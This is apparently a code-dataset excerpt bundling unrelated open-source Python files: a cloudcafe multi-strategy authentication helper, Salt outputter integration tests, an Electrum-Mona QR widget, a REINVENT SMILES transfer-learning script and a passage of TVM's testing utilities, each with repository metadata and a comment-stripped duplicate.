MFA_TokenAPI_Behaviors as RaxToken_MFA_API_Behaviors
from cloudcafe.extensions.saio_tempauth.v1_0.client import \
TempauthAPI_Client as SaioAuthAPI_Client
from cloudcafe.extensions.saio_tempauth.v1_0.behaviors import \
TempauthAPI_Behaviors as SaioAuthAPI_Behaviors
from cloudcafe.identity.v2_0.behaviors import IdentityServiceBehaviors
class MemoizedAuthServiceCompositeException(Exception):
pass
class MemoizedAuthServiceComposite(object):
def __init__(
self, service_name, region, endpoint_config=None,
user_config=None):
self.endpoint_config = endpoint_config or UserAuthConfig()
self.user_config = user_config or UserConfig()
self.service_name = service_name
self.region = region
@classmethod
@memoized
def get_rackspace_access_data(
cls, username, api_key, tenant_id, auth_endpoint):
client = RaxTokenAPI_Client(auth_endpoint, 'json', 'json')
behaviors = RaxTokenAPI_Behaviors(client)
return behaviors.get_access_data(username, api_key, tenant_id)
@classmethod
@memoized
def get_rackspace_mfa_access_data(
cls, username, password, tenant_id, auth_endpoint, passcode):
if passcode is None:
pass
token_client = RaxToken_MFA_API_Client(
url=auth_endpoint, serialize_format='json',
deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=username, password=password, tenant_id=tenant_id)
@classmethod
@memoized
def get_keystone_access_data(
cls, username, password, tenant_name, auth_endpoint):
return IdentityServiceBehaviors.get_access_data(
username, password, tenant_name, auth_endpoint)
@classmethod
@memoized
def get_saio_tempauth_access_data(
cls, username, password, auth_endpoint):
client = SaioAuthAPI_Client(auth_endpoint)
behaviors = SaioAuthAPI_Behaviors(client)
return behaviors.get_access_data(username, password)
@property
def access_data(self):
if self.auth_strategy == 'keystone':
return self.get_keystone_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_name,
self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth':
return self.get_rackspace_access_data(
self.user_config.username, self.user_config.api_key,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint)
elif self.auth_strategy == 'rax_auth_mfa':
return self.get_rackspace_mfa_access_data(
self.user_config.username, self.user_config.password,
self.user_config.tenant_id, self.endpoint_config.auth_endpoint,
self.user_config.passcode)
elif self.auth_strategy == 'saio_tempauth':
return self.get_saio_tempauth_access_data(
self.user_config.username, self.user_config.password,
self.endpoint_config.auth_endpoint)
else:
raise NotImplementedError
@property
def auth_strategy(self):
return self.endpoint_config.strategy.lower()
@property
def token_id(self):
return self.access_data.token.id_
@property
def tenant_id(self):
return self.access_data.token.tenant.id_
@property
def public_url(self):
endpoint = self.service.get_endpoint(self.region)
try:
return endpoint.public_url
except AttributeError:
raise MemoizedAuthServiceCompositeException(
"Unable to locate an endpoint with the region '{0}' in the "
"service '{1}' from the service service catalog for user {2}. "
"No public URL found.".format(
self.region, self.service_name, self.tenant_id))
@property
def service(self):
service = self.access_data.get_service(self.service_name)
if not service:
raise MemoizedAuthServiceCompositeException(
"Unable to locate a service named '{0}' in the service catalog"
" for the user {1}".format(self.service_name, self.tenant_id))
return service
class AuthProvider(object):
@staticmethod
def get_access_data(endpoint_config=None, user_config=None):
endpoint_config = endpoint_config or UserAuthConfig()
user_config = user_config or UserConfig()
if endpoint_config.strategy.lower() == 'keystone':
return IdentityServiceBehaviors.get_access_data(
user_config.username, user_config.password,
user_config.tenant_name, endpoint_config.auth_endpoint)
elif endpoint_config.strategy.lower() == 'rax_auth':
token_client = RaxTokenAPI_Client(
endpoint_config.auth_endpoint, 'json', 'json')
token_behaviors = RaxTokenAPI_Behaviors(token_client)
return token_behaviors.get_access_data(user_config.username,
user_config.api_key,
user_config.tenant_id)
elif endpoint_config.strategy.lower() == 'rax_auth_mfa':
passcode = user_config.passcode
if passcode is None:
pass
token_client = RaxToken_MFA_API_Client(
url=endpoint_config.auth_endpoint,
serialize_format='json', deserialize_format='json')
token_behaviors = RaxToken_MFA_API_Behaviors(token_client)
return token_behaviors.get_access_data(
username=user_config.username, password=user_config.password,
tenant_id=user_config.tenant_id, passcode=passcode)
elif endpoint_config.strategy.lower() == 'saio_tempauth':
auth_client = SaioAuthAPI_Client(endpoint_config.auth_endpoint)
auth_behaviors = SaioAuthAPI_Behaviors(auth_client)
return auth_behaviors.get_access_data(
user_config.username, user_config.password)
else:
raise NotImplementedError
| true | true |
1c3342a0fa5ffa4a0acc71147447042416e8f56a | 6,635 | py | Python | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | 1 | 2020-03-31T22:51:16.000Z | 2020-03-31T22:51:16.000Z | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/output/test_output.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | [
"Apache-2.0",
"MIT"
] | 1 | 2021-09-30T07:00:01.000Z | 2021-09-30T07:00:01.000Z | # -*- coding: utf-8 -*-
'''
:codeauthor: Nicole Thomas <nicole@saltstack.com>
'''
# Import Salt Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import traceback
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.mixins import RUNTIME_VARS
# Import Salt libs
import salt.config
import salt.utils.yaml
from salt.output import display_output
from salt.ext import six
class OutputReturnTest(ShellCase):
'''
Integration tests to ensure outputters return their expected format.
Tests against situations where the loader might not be returning the
right outputter even though it was explicitly requested.
'''
def test_output_json(self):
'''
Tests the return of json-formatted data
'''
ret = self.run_call('test.ping --out=json')
self.assertIn('{', ret)
self.assertIn('"local": true', ''.join(ret))
self.assertIn('}', ''.join(ret))
def test_output_nested(self):
'''
Tests the return of nested-formatted data
'''
expected = ['local:', ' True']
ret = self.run_call('test.ping --out=nested')
self.assertEqual(ret, expected)
def test_output_quiet(self):
'''
Tests the return of an out=quiet query
'''
expected = []
ret = self.run_call('test.ping --out=quiet')
self.assertEqual(ret, expected)
def test_output_pprint(self):
'''
Tests the return of pprint-formatted data
'''
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=pprint')
self.assertEqual(ret, expected)
def test_output_raw(self):
'''
Tests the return of raw-formatted data
'''
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=raw')
self.assertEqual(ret, expected)
def test_output_txt(self):
'''
Tests the return of txt-formatted data
'''
expected = ['local: True']
ret = self.run_call('test.ping --out=txt')
self.assertEqual(ret, expected)
def test_output_yaml(self):
'''
Tests the return of yaml-formatted data
'''
expected = ['local: true']
ret = self.run_call('test.ping --out=yaml')
self.assertEqual(ret, expected)
def test_output_yaml_namespaced_dict_wrapper(self):
'''
Tests the ability to dump a NamespacedDictWrapper instance, as used in
magic dunders like __grains__ and __pillar__
See https://github.com/saltstack/salt/issues/49269
'''
dumped_yaml = '\n'.join(self.run_call('grains.items --out=yaml'))
loaded_yaml = salt.utils.yaml.safe_load(dumped_yaml)
# We just want to check that the dumped YAML loades as a dict with a
# single top-level key, we don't care about the real contents.
assert isinstance(loaded_yaml, dict)
assert list(loaded_yaml) == ['local']
def test_output_unicodebad(self):
'''
Tests outputter reliability with utf8
'''
opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
opts['output_file'] = os.path.join(
RUNTIME_VARS.TMP,
'outputtest'
)
data = {'foo': {'result': False,
'aaa': 'azerzaeréééé',
'comment': u'ééééàààà'}}
try:
# this should not raises UnicodeEncodeError
display_output(data, opts=opts)
except Exception: # pylint: disable=broad-except
# display trace in error message for debugging on jenkins
trace = traceback.format_exc()
sentinel = object()
old_max_diff = getattr(self, 'maxDiff', sentinel)
try:
self.maxDiff = None
self.assertEqual(trace, '')
finally:
if old_max_diff is sentinel:
delattr(self, 'maxDiff')
else:
self.maxDiff = old_max_diff
def test_output_highstate(self):
'''
Regression tests for the highstate outputter. Calls a basic state with various
flags. Each comparison should be identical when successful.
'''
# Test basic highstate output. No frills.
expected = ['minion:', ' ID: simple-ping', ' Function: module.run',
' Name: test.ping', ' Result: True',
' Comment: Module function test.ping executed',
' Changes: ', ' ret:', ' True',
'Summary for minion', 'Succeeded: 1 (changed=1)', 'Failed: 0',
'Total states run: 1']
state_run = self.run_salt('"minion" state.sls simple-ping')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output while also passing --out=highstate.
# This is a regression test for Issue #29796
state_run = self.run_salt('"minion" state.sls simple-ping --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and running a state function.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and --out=highstate.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
def test_output_highstate_falls_back_nested(self):
'''
Tests outputter when passing --out=highstate with a non-state call. This should
fall back to "nested" output.
'''
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --out=highstate')
self.assertEqual(ret, expected)
def test_static_simple(self):
'''
Tests passing the --static option with a basic test.ping command. This
should be the "nested" output.
'''
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --static')
self.assertEqual(ret, expected)
| 36.059783 | 92 | 0.592766 |
from __future__ import absolute_import, print_function, unicode_literals
import os
import traceback
from tests.support.case import ShellCase
from tests.support.mixins import RUNTIME_VARS
import salt.config
import salt.utils.yaml
from salt.output import display_output
from salt.ext import six
class OutputReturnTest(ShellCase):
def test_output_json(self):
ret = self.run_call('test.ping --out=json')
self.assertIn('{', ret)
self.assertIn('"local": true', ''.join(ret))
self.assertIn('}', ''.join(ret))
def test_output_nested(self):
expected = ['local:', ' True']
ret = self.run_call('test.ping --out=nested')
self.assertEqual(ret, expected)
def test_output_quiet(self):
expected = []
ret = self.run_call('test.ping --out=quiet')
self.assertEqual(ret, expected)
def test_output_pprint(self):
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=pprint')
self.assertEqual(ret, expected)
def test_output_raw(self):
expected = ["{u'local': True}"] if six.PY2 else ["{'local': True}"]
ret = self.run_call('test.ping --out=raw')
self.assertEqual(ret, expected)
def test_output_txt(self):
expected = ['local: True']
ret = self.run_call('test.ping --out=txt')
self.assertEqual(ret, expected)
def test_output_yaml(self):
expected = ['local: true']
ret = self.run_call('test.ping --out=yaml')
self.assertEqual(ret, expected)
def test_output_yaml_namespaced_dict_wrapper(self):
dumped_yaml = '\n'.join(self.run_call('grains.items --out=yaml'))
loaded_yaml = salt.utils.yaml.safe_load(dumped_yaml)
assert isinstance(loaded_yaml, dict)
assert list(loaded_yaml) == ['local']
def test_output_unicodebad(self):
opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
opts['output_file'] = os.path.join(
RUNTIME_VARS.TMP,
'outputtest'
)
data = {'foo': {'result': False,
'aaa': 'azerzaeréééé',
'comment': u'ééééàààà'}}
try:
# this should not raises UnicodeEncodeError
display_output(data, opts=opts)
except Exception: # pylint: disable=broad-except
# display trace in error message for debugging on jenkins
trace = traceback.format_exc()
sentinel = object()
old_max_diff = getattr(self, 'maxDiff', sentinel)
try:
self.maxDiff = None
self.assertEqual(trace, '')
finally:
if old_max_diff is sentinel:
delattr(self, 'maxDiff')
else:
self.maxDiff = old_max_diff
def test_output_highstate(self):
# Test basic highstate output. No frills.
expected = ['minion:', ' ID: simple-ping', ' Function: module.run',
' Name: test.ping', ' Result: True',
' Comment: Module function test.ping executed',
' Changes: ', ' ret:', ' True',
'Summary for minion', 'Succeeded: 1 (changed=1)', 'Failed: 0',
'Total states run: 1']
state_run = self.run_salt('"minion" state.sls simple-ping')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output while also passing --out=highstate.
# This is a regression test for Issue #29796
state_run = self.run_salt('"minion" state.sls simple-ping --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and running a state function.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static')
for expected_item in expected:
self.assertIn(expected_item, state_run)
# Test highstate output when passing --static and --out=highstate.
# See Issue #44556.
state_run = self.run_salt('"minion" state.sls simple-ping --static --out=highstate')
for expected_item in expected:
self.assertIn(expected_item, state_run)
def test_output_highstate_falls_back_nested(self):
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --out=highstate')
self.assertEqual(ret, expected)
def test_static_simple(self):
expected = ['minion:', ' True']
ret = self.run_salt('"minion" test.ping --static')
self.assertEqual(ret, expected)
| true | true |
1c3344b206e7fa14a4a0cf6e031ac64c55973a92 | 1,753 | py | Python | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | electrum_mona/gui/qt/qrwindow.py | zcore-dev/electrum-mona | 2beb0c9c7794e8b03d1725bae41ee8b792c57275 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QWidget
from .qrcodewidget import QRCodeWidget
from electrum_mona.i18n import _
class QR_Window(QWidget):
def __init__(self, win):
QWidget.__init__(self)
self.win = win
self.setWindowTitle('Electrum - '+_('Payment Request'))
self.setMinimumSize(800, 800)
self.setFocusPolicy(Qt.NoFocus)
main_box = QHBoxLayout()
self.qrw = QRCodeWidget()
main_box.addWidget(self.qrw, 1)
self.setLayout(main_box)
| 38.108696 | 71 | 0.725613 |
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QWidget
from .qrcodewidget import QRCodeWidget
from electrum_mona.i18n import _
class QR_Window(QWidget):
def __init__(self, win):
QWidget.__init__(self)
self.win = win
self.setWindowTitle('Electrum - '+_('Payment Request'))
self.setMinimumSize(800, 800)
self.setFocusPolicy(Qt.NoFocus)
main_box = QHBoxLayout()
self.qrw = QRCodeWidget()
main_box.addWidget(self.qrw, 1)
self.setLayout(main_box)
| true | true |
1c3344d6bd423d534da455d71038b44401ebed57 | 3,849 | py | Python | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | transfer_learn_model.py | MauriceKarrenbrock/reinvent-memory | 57860dabb6534daf14fe2ab81d57589a90760442 | [
"MIT"
] | null | null | null | # coding=utf-8
import argparse
import logging
from typing import List
import numpy as np
import torch
from rdkit import Chem
from rdkit import rdBase
from torch.utils.data import DataLoader
from tqdm import tqdm
import models.reinvent
from chem import smiles
from models.reinvent.dataset import Dataset
from utils import decrease_learning_rate
from train_model import train
rdBase.DisableLog('rdApp.error')
def save_model(model, model_path, epoch, save_each_epoch):
model.checkpoint()
path = model_path
if save_each_epoch:
path += ".{}".format(epoch)
model.save(path)
def main():
parser = argparse.ArgumentParser(description="Performs transfer learning of a model on a SMILES file")
parser.add_argument("--input-model", '-i', help='Prior model file',
type=str, required=True)
parser.add_argument("--output-model", '-o', help='Path to the output model',
type=str, required=True)
parser.add_argument("--input-smiles", '-s', help='Path to the SMILES file',
type=str, required=True)
parser.add_argument("--standardize-smiles", help='Set if want to standardize the SMILES using RDKIT',
action="store_true", default=False)
parser.add_argument("--save-each-epoch", help="Set to save each epoch in a different model file.",
action="store_true", default=False)
parser.add_argument("--steps-to-change-lr", "--sclr", help="Number of steps to change learning rate", type=int,
default=500)
parser.add_argument("--lr-change", "--lrc", help="Ratio which the learning rate is changed", type=float,
default=0.01)
parser.add_argument("--epochs", help="Number of epochs to train [DEFAULT: 20]", type=int, default=20)
parser.add_argument("--batch-size", help="Number of molecules processed per batch [DEFAULT: 128]", type=int,
default=128)
parser.add_argument("--lr", help="Learning rate for training [DEFAULT: 0.0005]", type=float, default=0.0005)
parser.add_argument("--patience",
help=("Number of steps where the training get stopped if no loss improvement is noticed. "
"[DEFAULT: 30000]"),
type=int, default=30000)
parser.add_argument("--temperature", "-t",
help=("Temperature for the sequence sampling. Has to be larger than 0. Values below 1 make "
"the RNN more confident in it's generation, but also more conservative. "
"Values larger than 1 result in more random sequences. [DEFAULT: 1.0]"),
type=float, default=1.0)
args = parser.parse_args()
# setup the logger to get a nice output
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s: %(module)s.%(funcName)s +%(lineno)s: %(levelname)-8s %(message)s',
datefmt='%H:%M:%S'
)
model = models.reinvent.Model.load_from_file(args.input_model)
logging.info("Reading smiles...")
with open(args.input_smiles, 'r') as f:
lines = [line.strip().split()[0] for line in f]
logging.info("Read {} lines".format(len(lines)))
if args.standardize_smiles:
logging.info("Standardize SMILES")
smiles_list = smiles.standardize_smiles_list(lines)
else:
smiles_list = lines
train(model, smiles_list, model_path=args.output_model, epochs=args.epochs, batch_size=args.batch_size,
lr=args.lr, patience=args.patience, save_each_epoch=args.save_each_epoch,
steps_to_change_lr=args.steps_to_change_lr, lr_change=args.lr_change, temperature=args.temperature)
if __name__ == "__main__":
main()
| 43.738636 | 116 | 0.637049 |
import argparse
import logging
from typing import List
import numpy as np
import torch
from rdkit import Chem
from rdkit import rdBase
from torch.utils.data import DataLoader
from tqdm import tqdm
import models.reinvent
from chem import smiles
from models.reinvent.dataset import Dataset
from utils import decrease_learning_rate
from train_model import train
rdBase.DisableLog('rdApp.error')
def save_model(model, model_path, epoch, save_each_epoch):
model.checkpoint()
path = model_path
if save_each_epoch:
path += ".{}".format(epoch)
model.save(path)
def main():
parser = argparse.ArgumentParser(description="Performs transfer learning of a model on a SMILES file")
parser.add_argument("--input-model", '-i', help='Prior model file',
type=str, required=True)
parser.add_argument("--output-model", '-o', help='Path to the output model',
type=str, required=True)
parser.add_argument("--input-smiles", '-s', help='Path to the SMILES file',
type=str, required=True)
parser.add_argument("--standardize-smiles", help='Set if want to standardize the SMILES using RDKIT',
action="store_true", default=False)
parser.add_argument("--save-each-epoch", help="Set to save each epoch in a different model file.",
action="store_true", default=False)
parser.add_argument("--steps-to-change-lr", "--sclr", help="Number of steps to change learning rate", type=int,
default=500)
parser.add_argument("--lr-change", "--lrc", help="Ratio which the learning rate is changed", type=float,
default=0.01)
parser.add_argument("--epochs", help="Number of epochs to train [DEFAULT: 20]", type=int, default=20)
parser.add_argument("--batch-size", help="Number of molecules processed per batch [DEFAULT: 128]", type=int,
default=128)
parser.add_argument("--lr", help="Learning rate for training [DEFAULT: 0.0005]", type=float, default=0.0005)
parser.add_argument("--patience",
help=("Number of steps where the training get stopped if no loss improvement is noticed. "
"[DEFAULT: 30000]"),
type=int, default=30000)
parser.add_argument("--temperature", "-t",
help=("Temperature for the sequence sampling. Has to be larger than 0. Values below 1 make "
"the RNN more confident in it's generation, but also more conservative. "
"Values larger than 1 result in more random sequences. [DEFAULT: 1.0]"),
type=float, default=1.0)
args = parser.parse_args()
# setup the logger to get a nice output
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s: %(module)s.%(funcName)s +%(lineno)s: %(levelname)-8s %(message)s',
datefmt='%H:%M:%S'
)
model = models.reinvent.Model.load_from_file(args.input_model)
logging.info("Reading smiles...")
with open(args.input_smiles, 'r') as f:
lines = [line.strip().split()[0] for line in f]
logging.info("Read {} lines".format(len(lines)))
if args.standardize_smiles:
logging.info("Standardize SMILES")
smiles_list = smiles.standardize_smiles_list(lines)
else:
smiles_list = lines
train(model, smiles_list, model_path=args.output_model, epochs=args.epochs, batch_size=args.batch_size,
lr=args.lr, patience=args.patience, save_each_epoch=args.save_each_epoch,
steps_to_change_lr=args.steps_to_change_lr, lr_change=args.lr_change, temperature=args.temperature)
if __name__ == "__main__":
main()
| true | true |
1c3346169c6bab4811d070c2ac8b31e6fa4fdb84 | 24,960 | py | Python | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 90 | 2019-01-26T00:38:49.000Z | 2022-03-11T23:12:34.000Z | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 91 | 2019-02-27T00:17:01.000Z | 2022-02-21T18:08:21.000Z | python/tvm/testing.py | dvhg/tvm | 288e9ef41d7884cea3d868d6d2bbb672c058757b | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 41 | 2019-01-28T14:37:03.000Z | 2022-03-31T03:58:57.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,unnecessary-comprehension
""" TVM testing utilities
Testing Markers
***************
We use pytest markers to specify the requirements of test functions. Currently
there is a single distinction that matters for our testing environment: does
the test require a gpu. For tests that require just a gpu or just a cpu, we
have the decorator :py:func:`requires_gpu` that enables the test when a gpu is
available. To avoid running tests that don't require a gpu on gpu nodes, this
decorator also sets the pytest marker `gpu` so we can select the gpu subset
of tests (using `pytest -m gpu`).
Unfortunately, many tests are written like this:
.. python::
def test_something():
for target in all_targets():
do_something()
The test uses both gpu and cpu targets, so the test needs to be run on both cpu
and gpu nodes. But we still want to only run the cpu targets on the cpu testing
node. The solution is to mark these tests with the gpu marker so they will be
run on the gpu nodes. But we also modify all_targets (renamed to
enabled_targets) so that it only returns gpu targets on gpu nodes and cpu
targets on cpu nodes (using an environment variable).
Instead of using the all_targets function, future tests that would like to
test against a variety of targets should use the
:py:func:`tvm.testing.parametrize_targets` functionality. This allows us
greater control over which targets are run on which testing nodes.
If in the future we want to add a new type of testing node (for example
fpgas), we need to add a new marker in `tests/python/pytest.ini` and a new
function in this module. Then targets using this node should be added to the
`TVM_TEST_TARGETS` environment variable in the CI.
"""
import logging
import os
import sys
import time
import pytest
import numpy as np
import tvm
import tvm.arith
import tvm.tir
import tvm.te
import tvm._ffi
from tvm.contrib import nvcc
def assert_allclose(actual, desired, rtol=1e-7, atol=1e-7):
    """Wrapper around ``np.testing.assert_allclose`` with sensible default
    tolerances for testing.

    Note that ``actual`` and ``desired`` are not interchangeable: the
    comparison checks ``abs(actual - desired)`` against
    ``atol + rtol * abs(desired)``.  Because ``desired`` is frequently close
    to zero, a non-zero ``atol`` default is used.
    """
    actual_arr = np.asanyarray(actual)
    desired_arr = np.asanyarray(desired)
    # Compare shapes first so a mismatch produces a clear failure message.
    np.testing.assert_allclose(actual_arr.shape, desired_arr.shape)
    np.testing.assert_allclose(actual_arr, desired_arr, rtol=rtol, atol=atol, verbose=True)
def check_numerical_grads(
    function, input_values, grad_values, function_value=None, delta=1e-3, atol=1e-2, rtol=0.1
):
    """A helper function that checks that numerical gradients of a function are
    equal to gradients computed in some different way (analytical gradients).

    Numerical gradients are computed using finite difference approximation. To
    reduce the number of function evaluations, the number of points used is
    gradually increased if the error value is too high (up to 5 points).

    Parameters
    ----------
    function
        A function that takes inputs either as positional or as keyword
        arguments (either `function(*input_values)` or `function(**input_values)`
        should be correct) and returns a scalar result. Should accept numpy
        ndarrays.

    input_values : Dict[str, numpy.ndarray] or List[numpy.ndarray]
        A list of values or a dict assigning values to variables. Represents the
        point at which gradients should be computed.

    grad_values : Dict[str, numpy.ndarray] or List[numpy.ndarray]
        Gradients computed using a different method.

    function_value : float, optional
        Should be equal to `function(**input_values)`.

    delta : float, optional
        A small number used for numerical computation of partial derivatives.
        The default 1e-3 is a good choice for float32.

    atol : float, optional
        Absolute tolerance. Gets multiplied by `sqrt(n)` where n is the size of a
        gradient.

    rtol : float, optional
        Relative tolerance.

    Raises
    ------
    AssertionError
        If a gradient has an unexpected shape or differs too much from its
        numerical estimate.
    ValueError
        If NaN or infinity is produced while comparing gradients.
    """
    # If input_values is a list then function accepts positional arguments
    # In this case transform it to a function taking kwargs of the form {"0": ..., "1": ...}
    if not isinstance(input_values, dict):
        input_len = len(input_values)
        input_values = {str(idx): val for idx, val in enumerate(input_values)}

        # Default arguments bind input_len and the original function eagerly,
        # so the wrapper stays valid after `function` is rebound below.
        def _function(_input_len=input_len, _orig_function=function, **kwargs):
            return _orig_function(*(kwargs[str(i)] for i in range(input_len)))

        function = _function

        grad_values = {str(idx): val for idx, val in enumerate(grad_values)}

    if function_value is None:
        function_value = function(**input_values)

    # a helper to modify j-th element of val by a_delta
    def modify(val, j, a_delta):
        val = val.copy()
        val.reshape(-1)[j] = val.reshape(-1)[j] + a_delta
        return val

    # numerically compute a partial derivative with respect to j-th element of the var `name`
    def derivative(x_name, j, a_delta):
        modified_values = {
            n: modify(val, j, a_delta) if n == x_name else val for n, val in input_values.items()
        }
        return (function(**modified_values) - function_value) / a_delta

    # True when the numerical derivative n_der agrees with the analytical
    # gradient value at flat index j within atol/rtol tolerances.
    def compare_derivative(j, n_der, grad):
        der = grad.reshape(-1)[j]
        return np.abs(n_der - der) < atol + rtol * np.abs(n_der)

    for x_name, grad in grad_values.items():
        if grad.shape != input_values[x_name].shape:
            raise AssertionError(
                "Gradient wrt '{}' has unexpected shape {}, expected {} ".format(
                    x_name, grad.shape, input_values[x_name].shape
                )
            )

        # ngrad accumulates the numerical estimate of the gradient.
        ngrad = np.zeros_like(grad)

        wrong_positions = []

        # compute partial derivatives for each position in this variable
        for j in range(np.prod(grad.shape)):
            # forward difference approximation
            nder = derivative(x_name, j, delta)

            # if the derivative is not equal to the analytical one, try to use more
            # precise and expensive methods
            if not compare_derivative(j, nder, grad):
                # central difference approximation
                nder = (derivative(x_name, j, -delta) + nder) / 2

                if not compare_derivative(j, nder, grad):
                    # central difference approximation using h = delta/2
                    cnder2 = (
                        derivative(x_name, j, delta / 2) + derivative(x_name, j, -delta / 2)
                    ) / 2
                    # five-point derivative
                    nder = (4 * cnder2 - nder) / 3

            # if the derivatives still don't match, add this position to the
            # list of wrong positions
            if not compare_derivative(j, nder, grad):
                wrong_positions.append(np.unravel_index(j, grad.shape))

            ngrad.reshape(-1)[j] = nder

        wrong_percentage = int(100 * len(wrong_positions) / np.prod(grad.shape))

        # Euclidean distance between numerical and analytical gradients, and
        # the norm of the numerical gradient, used by the tolerance check below.
        dist = np.sqrt(np.sum((ngrad - grad) ** 2))
        grad_norm = np.sqrt(np.sum(ngrad ** 2))

        if not (np.isfinite(dist) and np.isfinite(grad_norm)):
            raise ValueError(
                "NaN or infinity detected during numerical gradient checking wrt '{}'\n"
                "analytical grad = {}\n numerical grad = {}\n".format(x_name, grad, ngrad)
            )

        # we multiply atol by this number to make it more universal for different sizes
        sqrt_n = np.sqrt(float(np.prod(grad.shape)))

        if dist > atol * sqrt_n + rtol * grad_norm:
            raise AssertionError(
                "Analytical and numerical grads wrt '{}' differ too much\n"
                "analytical grad = {}\n numerical grad = {}\n"
                "{}% of elements differ, first 10 of wrong positions: {}\n"
                "distance > atol*sqrt(n) + rtol*grad_norm\n"
                "distance {} > {}*{} + {}*{}".format(
                    x_name,
                    grad,
                    ngrad,
                    wrong_percentage,
                    wrong_positions[:10],
                    dist,
                    atol,
                    sqrt_n,
                    rtol,
                    grad_norm,
                )
            )

        max_diff = np.max(np.abs(ngrad - grad))
        avg_diff = np.mean(np.abs(ngrad - grad))
        logging.info(
            "Numerical grad test wrt '%s' of shape %s passes, "
            "dist = %f, max_diff = %f, avg_diff = %f",
            x_name,
            grad.shape,
            dist,
            max_diff,
            avg_diff,
        )
def assert_prim_expr_equal(lhs, rhs):
    """Assert that two primitive expressions are arithmetically equal.

    Parameters
    ----------
    lhs : tvm.tir.PrimExpr
        The left operand.

    rhs : tvm.tir.PrimExpr
        The right operand.

    Raises
    ------
    ValueError
        If the simplified difference of the operands is not the constant zero.
    """
    analyzer = tvm.arith.Analyzer()
    diff = analyzer.simplify(lhs - rhs)
